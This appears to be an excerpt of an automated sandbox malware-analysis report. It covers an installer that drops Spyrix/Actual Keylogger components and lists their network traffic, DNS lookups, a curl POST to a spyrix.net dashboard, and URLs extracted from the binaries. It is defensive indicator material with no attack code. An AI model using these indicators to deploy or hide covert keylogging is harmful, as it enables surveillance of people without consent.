            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://cdn.cdndownload.net/dashboard30/assets/index-004f4025.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-7e7c447a.css HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dashboard.spyrix.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Text.vue_vue_type_script_setup_true_lang-a664542d.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-ef960fb7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ConfirmPhoneModal.module-3f369b32.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/en-5393c481.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/index-1178777c.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Button.module-6d4e91b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonTemplate.module-c837805f.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonText.module-c769b9ae.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Modal.module-d62c47b8.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Button.vue_vue_type_script_setup_true_lang-56edf5a6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Nunito-Bold-765bfff4.woff2 HTTP/1.1Host: cdn.cdndownload.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dashboard.spyrix.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdn.cdndownload.net/dashboard30/assets/index-93c74fef.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/useValidation-954c07e6.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /dashboard30/assets/loop-c45f0f1e.js HTTP/1.1Host: cdn.cdndownload.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: qrl.exeString found in binary or memory: Usage: curl [options...] <url>
            Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: Usage: curl [options...] <url>3[LU[L}[L
            Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: Usage: curl [options...] <url>
            Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: Usage: curl [options...] <url>3[LU[L}[L
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SearchID="http://www.myspace.com/search/" equals www.myspace.com (Myspace)
            Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/search/ equals www.myspace.com (Myspace)
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: msgID="http://www.myspace.com/my/mail" equals www.myspace.com (Myspace)
            Source: global trafficDNS traffic detected: DNS query: filedn.com
            Source: global trafficDNS traffic detected: DNS query: cdnbaynet.com
            Source: global trafficDNS traffic detected: DNS query: swtb-download.spyrix-sfk.com
            Source: global trafficDNS traffic detected: DNS query: dashboard.spyrix.com
            Source: global trafficDNS traffic detected: DNS query: spyrix.net
            Source: global trafficDNS traffic detected: DNS query: cdn.cdndownload.net
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: unknownHTTP traffic detected: POST /dashboard/prg-actions HTTP/1.1Host: spyrix.netUser-Agent: curl/7.64.0Accept: */*Content-Length: 429Content-Type: application/x-www-form-urlencoded
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HTTPS://DASHBOARD.SPYRIX.COM/
            Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://.css
            Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://.jpg
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/ca.crl0:
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.certum.pl/l3.crl0a
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
            Source: 404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filedn.com
            Source: 404.exe, 00000000.00000002.1648823536.00000000026A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filedn.comd
            Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://html4/loose.dtd
            Source: qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://https://-.://%s%s%s/%s
            Source: spkl.exe, 00000033.00000002.3201106110.0000000000929000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://neftali.clubdelphi.com/
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.certum.pl0.
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?search
            Source: spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://rc.qzone.qq.com/qzonesoso/?searchq
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/l3.cer0
            Source: 404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: spkl.exeString found in binary or memory: http://spyrix.com/manual.php
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://user.qzone.qq.com
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vk.com/search
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://vk.com/searchecp
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.actualkeylogger.com/buynow.html
            Source: spkl.exeString found in binary or memory: http://www.actualkeylogger.com/help.html
            Source: spkl.exeString found in binary or memory: http://www.actualkeylogger.com/help.html#registrate
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.actualkeylogger.com/help.html#registratehttp://www.spyrix.com/manual.php#registrateU
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
            Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.00000000020B8000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
            Source: spkl.exe, spkl.exe, 00000033.00000002.3244401024.0000000004541000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3190059842.0000000000863000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://www.indyproject.org/
            Source: spkl.exeString found in binary or memory: http://www.indyproject.org/Original
            Source: 404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.innosetup.com/
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jrsoftware.org/0
            Source: 404.exe, 0000000C.00000000.1710941911.0000000000401000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/my/mail
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/search/
            Source: spkl.exe, 00000033.00000003.3027526818.0000000007C20000.00000004.00000800.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ok.ru/dk?st.cmd=searchResult
            Source: 404.exe, 0000000C.00000003.1712113818.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.1712556211.000000007FD10000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000000.1713397511.0000000000401000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.remobjects.com/ps
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com
